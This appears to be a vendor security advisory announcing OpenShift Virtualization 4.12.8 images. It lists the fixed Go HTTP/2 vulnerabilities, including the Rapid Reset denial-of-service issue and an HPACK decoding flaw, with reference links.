A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.This advisory contains OpenShift Virtualization 4.12.8 images.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding (CVE-2022-41723)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-41723References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Tag

#js